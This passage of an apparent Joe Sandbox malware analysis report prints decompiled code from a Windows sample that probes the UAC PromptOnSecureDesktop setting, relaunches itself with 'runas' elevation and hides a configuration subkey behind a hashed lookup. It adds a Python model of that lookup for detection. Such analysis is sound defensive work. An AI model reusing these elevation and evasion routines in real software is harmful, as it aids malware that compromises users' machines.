                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x40;
                                                                                                                                  				} else {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x38;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) = _t92;
                                                                                                                                  				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                                                                  				_t173 = _t172 + 0xc;
                                                                                                                                  				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                                                                  					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
                                                                                                                                  					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
                                                                                                                                  					_push(_t168 - 0x15c);
                                                                                                                                  					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
                                                                                                                                  					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                                                                  					_t173 = _t173 + 0x50;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                                                                  				 *(_t168 + 0x5c) = E00406EDD();
                                                                                                                                  				if( *(_t168 + 0x58) < 0x60) {
                                                                                                                                  					_t165 =  *(_t168 + 0x78);
                                                                                                                                  					_t161 = 0;
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					L33:
                                                                                                                                  					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                                                                  					if( *(_t168 + 0x5c) == _t161) {
                                                                                                                                  						L38:
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push(_t161); // executed
                                                                                                                                  						L39:
                                                                                                                                  						_t96 = E004091EB(); // executed
                                                                                                                                  						__eflags =  *0x412180 - _t161; // 0x0
                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                  							 *0x412180 =  *0x412180 | _t165;
                                                                                                                                  							__eflags =  *0x412180;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t96 - 0x2a;
                                                                                                                                  						_t81 = _t96 == 0x2a;
                                                                                                                                  						__eflags = _t81;
                                                                                                                                  						_t97 = 0 | _t81;
                                                                                                                                  						L42:
                                                                                                                                  						return _t97;
                                                                                                                                  					}
                                                                                                                                  					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
                                                                                                                                  					__eflags = _t100;
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push("runas");
                                                                                                                                  						goto L39;
                                                                                                                                  					}
                                                                                                                                  					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
                                                                                                                                  					__eflags = _t103;
                                                                                                                                  					 *0x412180 = _t103;
                                                                                                                                  					 *0x41217c =  *(_t168 + 0x54);
                                                                                                                                  					if(_t103 != 0) {
                                                                                                                                  						 *0x412180 = _t103 | _t165;
                                                                                                                                  					}
                                                                                                                                  					L31:
                                                                                                                                  					_t97 = 0;
                                                                                                                                  					goto L42;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x4c) = 4;
                                                                                                                                  				 *(_t168 + 0x44) = 5;
                                                                                                                                  				 *(_t168 + 0x48) = 1;
                                                                                                                                  				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
                                                                                                                                  				_t175 = _t173 + 0x14;
                                                                                                                                  				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
                                                                                                                                  				if(_t107 == 0) {
                                                                                                                                  					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
                                                                                                                                  					_t176 = _t175 + 0x14;
                                                                                                                                  					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
                                                                                                                                  					__eflags = _t112;
                                                                                                                                  					if(_t112 == 0) {
                                                                                                                                  						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
                                                                                                                                  						_t176 = _t176 + 0x14;
                                                                                                                                  						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
                                                                                                                                  						__eflags = _t117;
                                                                                                                                  						if(_t117 != 0) {
                                                                                                                                  							 *(_t168 + 0x78) = 0x3000;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						 *(_t168 + 0x78) = 0x2000;
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey( *(_t168 + 0x50));
                                                                                                                                  					_t165 =  *(_t168 + 0x78);
                                                                                                                                  				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x5e0d0106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x5e0d0107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e0d0000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}
Instruction addresses for the decompiled lines above (the per-line address column of the listing, in listing order; 0x00000000 marks lines with no mapped instruction):
0x00409326 0x00409327 0x00409330 0x00409339 0x00409348 0x00409358 0x0040935c 0x0040935c 0x0040935c 0x0040934a
0x00409353 0x00409353 0x00409375 0x0040937d 0x0040937f 0x0040937f 0x0040938c 0x00409394 0x004093a2 0x004093d9
0x004093dc 0x004093dd 0x004093e0 0x004093e3 0x004093e6 0x004093e9 0x004093ec 0x0040940c 0x00409412 0x004093a4
0x004093a4 0x004093a5 0x004093a8 0x004093ab 0x004093ae 0x004093b1 0x004093ce 0x004093d4 0x004093d4 0x0040941d
0x00409420 0x00409425 0x0040942c 0x00409441 0x0040945d 0x0040946b 0x0040948d 0x0040949b 0x004094a0 0x004094a0
0x004094a3 0x004094b0 0x004094b3 0x0040962f 0x00409632 0x00409632 0x00409634 0x00409634 0x00409637 0x0040967b
0x00409681 0x00409682 0x00409683 0x00409683 0x0040968a 0x00409690 0x00409692 0x00409692 0x00409692 0x0040969a
0x0040969d 0x0040969d 0x004096a0 0x004096a2 0x004096a9 0x004096a9 0x00409641 0x00409648 0x0040964a 0x00409673
0x00409674 0x00000000 0x00409674 0x00409652 0x00409652 0x00409657 0x0040965c 0x00409662 0x00409666 0x00409666
0x0040962b 0x0040962b 0x00000000 0x0040962b 0x004094ce 0x004094d5 0x004094dc 0x004094e3 0x004094e8 0x004094f1
0x004094f9 0x0040951a 0x0040951f 0x00409526 0x0040952c 0x0040952e 0x00409551 0x00409556 0x0040955d 0x00409563
0x00409565 0x00409567 0x00409567 0x00409530 0x00409530 0x00409530 0x00409571 0x00409577 0x004094fb 0x004094fb
0x004094fb 0x0040957a 0x0040957f 0x0040958d 0x00000000 0x00000000 0x00409597 0x0040959a 0x0040961a 0x0040961f
0x0040961f 0x00000000 0x004095a3 0x004095c0 0x0040960c 0x00409612 0x00409625 0x00409625 0x00000000 0x00409625
0x004095d1 0x004095db 0x004095e7 0x004095ed 0x004095f3 0x004095f9 0x00409601 0x00409601 0x004095f9 0x00000000
0x004095db 0x00000000 0x00000000 0x00000000

APIs
• GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
• GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
• wsprintfA.USER32 ref: 004093CE
• wsprintfA.USER32 ref: 0040940C
• wsprintfA.USER32 ref: 0040948D
• RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
• RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
• RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
• String ID: PromptOnSecureDesktop$runas
• API String ID: 3696105349-2220793183
• Opcode ID: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
• Instruction ID: 6752aeb10d98b7ea2ac03540c689f78e3d44a0922e5129ac444c5da45af1d8ff
• Opcode Fuzzy Hash: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
• Instruction Fuzzy Hash: 5EA181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 614 406a60-406a89 CreateFileA 615 406b8c-406ba1 GetLastError 614->615 616 406a8f-406ac3 GetDiskFreeSpaceA 614->616 617 406ba3-406ba6 615->617 618 406ac5-406adc call 40eb0e 616->618 619 406b1d-406b34 call 406987 616->619 618->619 626 406ade 618->626 624 406b56-406b63 FindCloseChangeNotification 619->624 625 406b36-406b54 GetLastError CloseHandle 619->625 628 406b65-406b7d GetLastError CloseHandle 624->628 629 406b86-406b8a 624->629 627 406b7f-406b80 DeleteFileA 625->627 630 406ae0-406ae5 626->630 631 406ae7-406afb call 40eca5 626->631 627->629 628->627 629->617 630->631 632 406afd-406aff 630->632 631->619 632->619 635 406b01 632->635 636 406b03-406b08 635->636 637 406b0a-406b17 call 40eca5 635->637 636->619 636->637 637->619
C-Code - Quality: 100%
			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				int _t42;
				intOrPtr _t43;
				int _t44;
                                                                                                                                  				void* _t53;
                                                                                                                                  				int _t59;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  				int _t73;
                                                                                                                                  
                                                                                                                                  				_t59 = __edx;
                                                                                                                                  				_t68 = _a4;
                                                                                                                                  				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                  				_v12 = _t31;
                                                                                                                                  				if(_t31 == 0xffffffff) {
                                                                                                                                  					 *0x412180 = 0x5e0d0101;
                                                                                                                                  					 *0x41217c = GetLastError();
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_v8 =  *_t68;
                                                                                                                                  				_v7 = _t68[1];
                                                                                                                                  				_t63 = _a12;
                                                                                                                                  				_v6 = _t68[2];
                                                                                                                                  				_v5 = 0;
                                                                                                                                  				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed
                                                                                                                                  				if(_t42 == 0) {
                                                                                                                                  					L10:
                                                                                                                                  					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed
                                                                                                                                  					_v28 = _t43;
                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                  						_t44 = FindCloseChangeNotification(_v12); // executed
                                                                                                                                  						__eflags = _t44;
                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                  							L15:
                                                                                                                                  							return _v28;
                                                                                                                                  						}
                                                                                                                                  						 *0x412180 = 0x5e0d0103;
                                                                                                                                  						 *0x41217c = GetLastError();
                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                  						L14:
                                                                                                                                  						DeleteFileA(_t68);
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					 *0x412180 = 0x5e0d0102;
                                                                                                                                  					 *0x41217c = GetLastError();
                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
                                                                                                                                  				_t69 = _t69 + 0x10;
                                                                                                                                  				_t73 = _t59;
                                                                                                                                  				if(_t73 < 0) {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  				if(_t73 > 0 || _t53 > 0x6400000) {
                                                                                                                                  					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
                                                                                                                                  					_t63 = _t22;
                                                                                                                                  					goto L10;
                                                                                                                                  				} else {
                                                                                                                                  					__eflags = _t59;
                                                                                                                                  					if(__eflags < 0) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					if(__eflags > 0) {
                                                                                                                                  						L9:
                                                                                                                                  						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
                                                                                                                                  						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t53 - 0x3200000;
                                                                                                                                  					if(_t53 <= 0x3200000) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1251348514-2980165447
                                                                                                                                  • Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction ID: 11eff480047975ec65ad8f821bd7964ca9f9c490359b1bf2623e7d0ea65c751f
                                                                                                                                  • Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction Fuzzy Hash: 2631F1B2900208BFDB00DFA09D44ADF7F79EF48310F158076E212F7291D674A9658F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 749 40ec54-40ec8f GetSystemTimeAsFileTime GetVolumeInformationA
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EC54() {
                                                                                                                                  				long _v8;
                                                                                                                                  				struct _FILETIME _v16;
                                                                                                                                  				signed int _t11;
                                                                                                                                  
                                                                                                                                  				GetSystemTimeAsFileTime( &_v16);
                                                                                                                                  				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
                                                                                                                                  				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
                                                                                                                                  				 *0x4136cc = _t11;
                                                                                                                                  				return _t11;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                   Control-flow Graph (graph image not reproduced; node list summarised)

                                                                                                                                   • Basic blocks ad092b-ad0a3e in the 0xAD0000 region; the entry block reads the PEB (GetPEB) and later blocks call ad0d35 and ad0d0c
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                  • Instruction ID: 639cbf737e4a0a6b2b1cda363200c12007c05689cd24543dc61b07835d1c9a01
                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                  • Instruction Fuzzy Hash: 61314CB6900609DFDB10CF99C880BAEBBF5FF48724F25404AD442A7351D771EA45CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			// Heap-allocation wrapper: takes _a4 bytes from the process heap and hands the
                                                                                                                                   			// new block to E0040EB74 (which, per the subcall APIs listed below, calls HeapSize on it).
                                                                                                                                   			E0040EBCC(long _a4) {
                                                                                                                                   				void* _t3;
                                                                                                                                   				void* _t7;
                                                                                                                                   
                                                                                                                                   				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed; flags 0, so no HEAP_ZERO_MEMORY
                                                                                                                                   				_t7 = _t3;
                                                                                                                                   				E0040EB74(_t7); // post-processes the block; its return value is discarded
                                                                                                                                   				return _t7; // NULL if RtlAllocateHeap failed; no check is made here
                                                                                                                                   			}





                                                                                                                                  0x0040ebda
                                                                                                                                  0x0040ebe0
                                                                                                                                  0x0040ebe3
                                                                                                                                  0x0040ebec

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                    • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                                                                    • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocateSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559512979-0
                                                                                                                                  • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                                                                  • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                                                                  • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                                                                  • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
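The registry walk in E004073FF (decompiled below) does not open a fixed subkey name. It opens an HKLM path with samDesired 0x20119, enumerates every subkey with RegEnumKeyA, hashes each name with E0040F1A5, XORs the hash with 0x5e5e5e5e and compares the result with a target value obtained from E00406DC2; only a matching subkey is then opened with samDesired 0x101. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It decodes the two access masks and reproduces the lookup loop against a constructed list of subkey names, with an optional live mode through winreg on Windows. The hash routine (FNV-1a stand-in) and the HKLM path are assumptions, because neither E0040F1A5 nor the path produced by E00402544 appears in this section.

```python
"""Model of the subkey lookup in E004073FF (added example; not the sample's code)."""
from typing import Iterable, List, Optional

XOR_MASK = 0x5E5E5E5E   # mask applied to the name hash before the compare (from the decompilation)

# Registry access-mask bits (winnt.h / winreg.h values).
KEY_QUERY_VALUE        = 0x0001
KEY_SET_VALUE          = 0x0002
KEY_CREATE_SUB_KEY     = 0x0004
KEY_ENUMERATE_SUB_KEYS = 0x0008
KEY_NOTIFY             = 0x0010
KEY_CREATE_LINK        = 0x0020
KEY_WOW64_64KEY        = 0x0100
KEY_WOW64_32KEY        = 0x0200
KEY_READ               = 0x20019   # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY

_KEY_BITS = [
    (KEY_QUERY_VALUE, "KEY_QUERY_VALUE"), (KEY_SET_VALUE, "KEY_SET_VALUE"),
    (KEY_CREATE_SUB_KEY, "KEY_CREATE_SUB_KEY"), (KEY_ENUMERATE_SUB_KEYS, "KEY_ENUMERATE_SUB_KEYS"),
    (KEY_NOTIFY, "KEY_NOTIFY"), (KEY_CREATE_LINK, "KEY_CREATE_LINK"),
    (KEY_WOW64_64KEY, "KEY_WOW64_64KEY"), (KEY_WOW64_32KEY, "KEY_WOW64_32KEY"),
]

# Placeholder path (assumption): the real path is produced at runtime by E00402544 and is not shown here.
HKLM_PATH = r"SOFTWARE\Placeholder\Path"

# Constructed subkey names for the offline run; they stand in for what RegEnumKeyA would return.
SAMPLE_SUBKEYS: List[str] = ["Config", "a1b2c3", "Settings", "Update", "x9y8z7"]


def decode_sam(sam: int) -> str:
    """Render a samDesired mask as named flags, e.g. 0x20119 -> 'KEY_READ | KEY_WOW64_64KEY'."""
    names, rest = [], sam
    if rest & KEY_READ == KEY_READ:          # composite right first so it is not split into its bits
        names.append("KEY_READ")
        rest &= ~KEY_READ
    for value, name in _KEY_BITS:
        if rest & value:
            names.append(name)
            rest &= ~value
    if rest:                                 # anything this table does not know stays numeric
        names.append(hex(rest))
    return " | ".join(names) if names else "0"


def name_hash(name: str) -> int:
    """Stand-in for E0040F1A5 (assumption: 32-bit FNV-1a; the sample's routine is not in this section)."""
    h = 0x811C9DC5
    for b in name.encode("ascii", "replace"):
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h


def masked_target(name: str) -> int:
    """Value E00406DC2 would have to return for `name` to be selected: hash XOR 0x5e5e5e5e."""
    return name_hash(name) ^ XOR_MASK


def find_config_subkey(subkeys: Iterable[str], target: int) -> Optional[str]:
    """Mirror the RegEnumKeyA loop: return the first subkey whose masked hash equals the target."""
    for index, name in enumerate(subkeys):   # index plays the role of dwIndex passed to RegEnumKeyA
        if (name_hash(name) ^ XOR_MASK) == target:
            return name
    return None                              # loop ended (RegEnumKeyA returned non-zero) without a match


def enumerate_subkeys_live(path: str = HKLM_PATH) -> List[str]:
    """Windows-only: the same enumeration against the real registry, requesting the 64-bit view."""
    import winreg  # absent off Windows, so imported lazily
    names: List[str] = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path, 0, winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as key:
        index = 0
        while True:
            try:
                names.append(winreg.EnumKey(key, index))
            except OSError:                  # ERROR_NO_MORE_ITEMS ends the loop, as in the sample
                break
            index += 1
    return names


if __name__ == "__main__":
    print("RegOpenKeyExA samDesired 0x20119 =", decode_sam(0x20119))
    print("RegOpenKeyExA samDesired 0x101   =", decode_sam(0x101))
    target = masked_target("x9y8z7")        # pretend E00406DC2 produced this value
    print("selected subkey:", find_config_subkey(SAMPLE_SUBKEYS, target))
```

Because the subkey is chosen by hash at runtime, a detection rule keyed on a fixed key name under that path will not match; the observable behaviour is a 32-bit process enumerating subkeys of an HKLM path while requesting the 64-bit view (KEY_WOW64_64KEY), which is what `decode_sam` makes explicit.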

                                                                                                                                   Control-flow Graph (graph image not reproduced; node list summarised)

                                                                                                                                   • Basic blocks 4073ff-407808; Windows API calls in graph order: RegOpenKeyExA, RegEnumKeyA, RegCloseKey, RegOpenKeyExA, RegQueryValueExA, GetFileAttributesExA, RegCloseKey
                                                                                                                                   • Internal calls: 406dc2, 402544, 40ee2a, 406cad, 40f1a5, 40ef00, 40ee95, 40ed03, 40ed77, 40ed23, 406c96, 40ee08
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				int* _v24;
                                                                                                                                  				char* _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				int _v36;
                                                                                                                                  				char _v295;
                                                                                                                                  				char _v296;
                                                                                                                                  				char _v556;
                                                                                                                                  				void _v592;
                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                  				int** _t86;
                                                                                                                                  				char* _t87;
                                                                                                                                  				char* _t88;
                                                                                                                                  				intOrPtr _t89;
                                                                                                                                  				char* _t91;
                                                                                                                                  				long _t92;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				long _t97;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				long _t107;
